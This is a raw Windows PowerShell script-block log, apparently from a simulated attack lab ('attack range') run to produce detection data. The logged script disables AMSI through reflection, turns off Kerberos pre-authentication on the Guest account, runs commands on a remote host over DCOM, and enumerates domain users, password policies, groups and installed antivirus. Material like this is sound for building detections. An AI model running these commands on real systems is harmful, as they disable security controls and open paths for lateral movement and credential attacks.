4104132150x0101353Microsoft-Windows-PowerShell/Operationalwin-dc-tcontreras-attack-range-677.attackrange.local11Get-LocalUser | Out-File -FilePath .\localUser.txt; Get-ADUserResultantPasswordPolicy -Identity Administrator | Out-File -FilePath .\PasswordPolicy.txt; Get-ADuser Guest | Set-ADAccountControl -DoesNotRequirePreAuth:$true; Get-ADDefaultDomainPasswordPolicy | Out-File -FilePath .\ADDefaultPassPolicy.txt;Enter-PSSession -ComputerName ar-win-dc-default-attack-range;[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt;$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append;[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt;get-wmiobject win32_group | Out-File -FilePath .\DomainGroup.txt;$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")); $item = $o.Item() ; $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0);[activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.0.1.16")).Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0); Get-AdComputer -Filter * | Out-File -FilePath .\AdComputer.txt;[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);Invoke-Command -ComputerName ar-win-dc-default-attack-range -ScriptBlock {ipconfig};Get-WmiObject -Query “SELECT * FROM AntiSpywareProduct”;Get-WmiObject -Query “SELECT * FROM AntiVirusProduct”;get-wmiobject Win32_ComputerSystemProducta4de67dc-2c1f-4ed7-85bd-4fba124ed6e2C:\Temp\simulate.ps1
4104132150x0101093Microsoft-Windows-PowerShell/Operationalwin-dc-tcontreras-attack-range-677.attackrange.local11Get-LocalUser | Out-File -FilePath .\localUser.txt
Get-ADUserResultantPasswordPolicy -Identity Administrator | Out-File -FilePath .\PasswordPolicy.txt
Get-ADuser Guest | Set-ADAccountControl -DoesNotRequirePreAuth:$true
Get-ADDefaultDomainPasswordPolicy | Out-File -FilePath .\ADDefaultPassPolicy.txt
Enter-PSSession -ComputerName ar-win-dc-default-attack-range
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
get-wmiobject win32_group | Out-File -FilePath .\DomainGroup.txt
$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $o.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
[activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.0.1.16")).Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
powershell.exe Get-AdComputer -Filter * | Out-File -FilePath .\AdComputer.txt
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Command -ComputerName ar-win-dc-default-tcontreras-attack-range -ScriptBlock {ipconfig}
Get-WmiObject -Query "SELECT * FROM AntiSpywareProduct"
Get-WmiObject -Query "SELECT * FROM AntiVirusProduct"
get-wmiobject Win32_ComputerSystemProduct5b113130-9a93-41be-b3c4-f38d1d313ea5C:\Temp\simulate.ps1